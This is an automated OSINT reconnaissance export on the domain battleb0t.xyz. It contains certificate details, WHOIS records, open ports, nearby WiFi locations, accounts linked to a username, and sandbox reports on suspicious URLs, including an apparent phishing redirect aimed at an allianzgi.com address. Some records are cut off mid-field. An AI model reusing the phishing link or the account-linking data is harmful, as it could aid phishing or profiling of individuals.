TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1F:80:B0:A7:B9:49:16:0F:27:7B:7C:B9:F5:38:B5:3D:C9:3C:2F:40
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 27 18:04:53.353 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:C2:49:4E:83:B3:46:DC:0B:F2:4C:E0:
2C:BD:3A:21:A9:D3:87:F4:AC:B5:4F:45:81:1D:09:75:
FB:9B:D3:9E:A5:02:20:54:1A:EC:0B:6C:62:AB:8A:0B:
14:2D:42:2F:00:E8:AD:FF:98:7D:A9:48:C3:5C:9D:C9:
A1:63:83:E1:17:D2:4C
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 27 18:04:53.360 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:8C:E5:2C:49:4A:30:97:4C:B4:E6:F3:
86:6A:09:B6:EF:84:21:66:BD:9C:17:9A:88:7C:B9:2A:
4D:1D:CC:99:A2:02:20:13:E4:A1:38:F5:80:6B:55:F9:
DB:4D:54:23:A0:D3:2F:61:E4:B8:03:26:A2:87:C1:4D:
B4:9F:8A:D7:F3:2F:04
Signature Algorithm: sha256WithRSAEncryption
3d:8b:b7:2f:1c:19:9b:ce:8a:9f:49:6d:8e:1c:b1:06:ce:80:
4b:f8:df:50:39:97:3e:fb:8f:2c:ca:50:c1:5c:f8:46:84:02:
f2:57:a0:5c:d2:47:ea:75:b7:5b:8e:d7:bb:b6:ac:23:17:33:
df:77:0a:d0:66:44:16:5a:cd:a4:73:04:82:9c:6e:c5:c2:96:
07:18:e4:ea:f3:48:89:72:cc:2c:e6:89:4a:c1:18:8b:b6:a9:
9e:48:30:26:9c:5a:b4:6d:2c:74:dd:50:cc:be:12:4c:8d:38:
29:5e:de:cf:04:54:ae:14:ed:ec:f9:b8:a0:90:94:ff:e1:0c:
9e:34:2b:1c:68:fd:56:79:13:27:78:22:6f:18:f3:9e:26:b0:
3c:46:ba:7f:dd:d6:fc:c7:27:bd:b5:77:38:03:ba:7b:08:e5:
f1:08:df:bb:f5:ea:f4:e1:c8:be:e6:b7:32:bc:2d:9d:1a:68:
d8:d8:3b:7d:a5:0b:bf:d3:08:d9:73:26:67:23:22:51:a7:9a:
35:1e:3d:5b:8d:37:8d:5a:13:a6:11:a6:6e:3f:57:92:c4:df:
b9:a6:2d:3e:a3:ac:33:74:bf:a3:4d:bc:55:ad:8d:cf:76:66:
f9:f9:8f:df:06:4b:e6:21:7f:06:3d:9b:6e:9c:3f:93:fd:2b:
41:f7:2c:66
| battleb0t.xyz |
| 2023-05-12 02:44:22 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.108.153 |
| 2023-05-12 03:03:19 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-0-256.github.io |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 1200 (Net ID: 00:01:03:7C:0A:E5) | 41.8781, -87.6298 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Internet Archive Account (Category: misc)
https://archive.org/details/@ayhu | ayhu |
| 2023-05-12 03:23:19 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.5:8080 | 188.114.96.0/24 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Pinterest (Category: social)
https://www.pinterest.com/ayhu/ | ayhu |
| 2023-05-12 02:54:44 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_330_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_330_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_330_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_330_ConnHashTable<816>_HashTable_Mutex"\n "IsoScope_330_IE_EarlyTabStart_0x690_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_330_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_816"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "172.66.43.150:443"\n "185.88.152.184:443"\n "35.186.254.174:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "rabetsanatkoosha.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "urlref_httpsllink.tou_https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.com" as clean (type is "HTML document ASCII text")\n Antivirus vendors marked dropped file "TarBB6A.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarBA30.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabBA1F.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabBB69.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpsllink.tou_https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "TarBB6A.tmp" has type "data"- Location: [%TEMP%\\TarBB6A.tmp]- [targetUID: 00000000-00002892]\n "_9E69994D-BE57-11ED-B6C3-080027D6CFFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002892]\n "~DF41FFD31729A203FF.TMP" has type "data"- Location: [%TEMP%\\~DF41FFD31729A203FF.TMP]- [targetUID: 00000000-00000816]\n "RecoveryStore._9E69994B-BE57-11ED-B6C3-080027D6CFFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "6JGINI9K.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6JGINI9K.txt]- [targetUID: 00000000-00000816]\n "J0N78Y0C.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J0N78Y0C.txt]- [targetUID: 00000000-00000816]\n "CabBA1F.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabBA1F.tmp]- [targetUID: 00000000-00002892]\n "S35ZJMPU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S35ZJMPU.txt]- [targetUID: 00000000-00000816]\n "MYW52O1X.htm" has type "HTML document ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\MYW52O1X.htm]- [targetUID: 00000000-00002892]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "CabBB69.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabBB69.tmp]- [targetUID: 00000000-00002892]\n "_A7F3014A-BE57-11ED-B6C3-080027D6CFFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFF51E1B1269B03A86.TMP" has type "data"- Location: [%TEMP%\\~DFF51E1B1269B03A86.TMP]- [targetUID: 00000000-00000816]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "www.microsoft.com0"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "C.JgU/0$"\n Pattern match: "https://track.salesflare.com/flare.js"\n Pattern match: "MUID1C5CECAFE62F66650020FE60E76367DFmsn.com/1025229670643231098083270159623031019620*"\n Heuristic match: "api.salesflare.com"\n Pattern match: "https://api.salesflare.com/,a=new"\n Pattern match: "https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.comAccept-Language"\n Heuristic match: "hctp_://rabet_anatkoo_ha.com"\n Pattern match: "https://llink.toaccess-control-allow-credentials"\n Pattern match: "https://llink.to"\n Pattern match: "https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.com"\n Pattern match: "isdomainmigratedtruewww.msn.com/1025319012595231055838270143998031019620*"\n Pattern match: "MUIDB0843E9110DDB6B4E0942FBDE0C5F6A01ieonline.microsoft.com/9216229670643231098083269878373031019620*"\n Heuristic match: "rabetsanatkoosha.com"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z+N0L0J+0"\n Pattern match: "SUIDMmicrosoft.com/9216216421721631019729269862748031019620*MUID0843E9110DDB6B4E0942FBDE0C5F6A01microsoft.com/1025229670643231098083269862748031019620*_EDGE_V1microsoft.com/9216229670643231098083269878373031019620*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: "SUIDMmicrosoft.com/9216216421721631019729269862748031019620*MUID0843E9110DDB6B4E0942FBDE0C5F6A01microsoft.com/1025229670643231098083269862748031019620*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA6"\n Pattern match: "SUIDMmicrosoft.com/9216216421721631019729269862748031019620*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=202201"\n Pattern match: "www.msn.com/"\n Pattern match: "https://rabetsanatkoosha.com/SNS/allianzgi.com/aBC@allianzgi.com"\n Pattern match: "llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.com"\n Heuristic match: "ianzgi.com"\n Heuristic match: "link.to"\n Heuristic match: "u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.com"\n Heuristic match: "api.ipify.org"\n Heuristic match: "checkip.amazonaws.com"\n Heuristic match: "checkip.dyndns.com"\n Heuristic match: "checkip.dyndns.org"\n Heuristic match: "checkip.org"\n Heuristic match: "checkmyip.com"\n Heuristic match: "cmyip.com"\n Heuristic match: "curlmyip.com"\n Heuristic match: "findmyip.org"\n Heuristic match: "formyip.com"\n Heuristic match: "geoip.co.uk"\n Heuris | 185.199.109.153 |
| 2023-05-12 02:46:30 | Netblock Membership | No | RIPE | 1 | 0 | 3 | 0 | None | 104.21.64.0/20 | 104.21.71.14 |
| 2023-05-12 02:54:10 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:4700:3031::6815:6a6:443 | 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:31:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com | Domain Name: NETCRAFT.COM
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-12-07T10:43:50Z
Creation Date: 1994-10-18T04:00:00Z
Registry Expiry Date: 2026-10-17T04:00:00Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: AUTHNS1.NETCRAFT.COM
Name Server: AUTHNS2.NETCRAFT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain name: netcraft.com
Registry Domain ID: 509179_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2020-09-21T12:40:37.88Z
Creation Date: 1994-10-18T04:00:00.00Z
Registrar Registration Expiration Date: 2026-10-17T04:00:00.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: fd796f83a89a42f2a69f4b9f2c757b8f.protect@withheldforprivacy.com
Name Server: authns1.netcraft.com
Name Server: authns2.netcraft.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:56:11.35Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:55:28 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | {u'count': 3, u'search_terms': [{u'id': u'host', u'value': u'104.21.6.166'}], u'result': [{u'environment_id': 100, u'job_id': u'640a87ec5deba64bf90bd5e3', u'analysis_start_time': u'2023-03-10 01:29:16', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'15de03b9f1a0096ab0b30f52b553b469c70dbccd4417995d4b7fdc4cee25557a', u'type': None, u'type_short': u'url', u'size': 67}, {u'environment_id': 160, u'job_id': u'63fc26ad86a713231f0ec51d', u'analysis_start_time': u'2023-02-27 03:42:37', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 1, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'69980d4c29a4a5407bb25c94430a4932ebe493bfead4f5a2fabc21dbc30aebda', u'type': None, u'type_short': u'url', u'size': 68}, {u'environment_id': 160, u'job_id': u'63a00a6524ef340fae30348a', u'analysis_start_time': u'2022-12-19 06:53:25', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 23, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'15de03b9f1a0096ab0b30f52b553b469c70dbccd4417995d4b7fdc4cee25557a', u'type': None, u'type_short': u'url', u'size': 67}]} | 104.21.6.166 |
| 2023-05-12 02:44:12 | SSL Certificate Host Mismatch | Yes | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | *.cloudwaysapps.com, cloudwaysapps.com | kekw.battleb0t.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | overkant (Net ID: 00:01:36:07:DC:22) | 52.3759, 4.8975 |
| 2023-05-12 02:51:36 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://webcamoid.github.io/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "IsoScope_c64_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3172"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_c64_IE_EarlyTabStart_0xa8c_Mutex"\n "IsoScope_c64_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_c64_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_c64_ConnHashTable<3172>_HashTable_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c64_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "webcamoid.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"webcamoid_1_.png" has type "PNG image data 64 x 64 8-bit/color RGBA non-interlaced" and extension "png"\n "favicon_1_.png" has type "PNG image data 16 x 15 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{b04a5edd-ee0f-11ed-acb1-080027098343}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df196c020f5a094e9f.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df196c020f5a094e9f.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{b04a5edd-ee0f-11ed-acb1-080027098343}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfb061f576187ef20c.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{b04a5edf-ee0f-11ed-acb1-080027098343}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "ClearSans-Light_1_.ttf" has type "TrueType Font data 20 tables 1st "GPOS" 24 names Macintosh Font software Copyright \\251 2012 Intel Corporation. Licensed under the Apache License Version"- [targetUID: N/A]\n "DesktopCapture_1_.webp" has type "RIFF (little-endian) data Web/P image"- [targetUID: N/A]\n "VirtualCamera_1_.webp" has type "RIFF (little-endian) data Web/P image"- [targetUID: N/A]\n "Main_1_.webp" has type "RIFF (little-endian) data Web/P image"- [targetUID: N/A]\n "Recording_1_.webp" has type "RIFF (little-endian) data Web/P image"- [targetUID: N/A]\n "Effects_1_.webp" has type "RIFF (little-endian) data Web/P image"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003172]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFB061F576187EF20C.TMP" has type "data"- Location: [%TEMP%\\~DFB061F576187EF20C.TMP]- [targetUID: 00000000-00003172]\n "~DF196C020F5A094E9F.TMP" has type "data"- Location: [%TEMP%\\~DF196C020F5A094E9F.TMP]- [targetUID: 00000000-00003172]\n "~DF3999E32F2D2A875E.TMP" has type "data"- Location: [%TEMP%\\~DF3999E32F2D2A875E.TMP]- [targetUID: 00000000-00003172]\n "~DFF70C03EBA959F549.TMP" has type "data"- Location: [%TEMP%\\~DFF70C03EBA959F549.TMP]- [targetUID: 00000000-00003172]\n "desktop_1_.css" has type "ASCII text"- [targetUID: N/A]\n "EBSTL18C.htm" has type "HTML document ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\EBSTL18C.htm]- [targetUID: 00000000-00002944]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00003172]\n 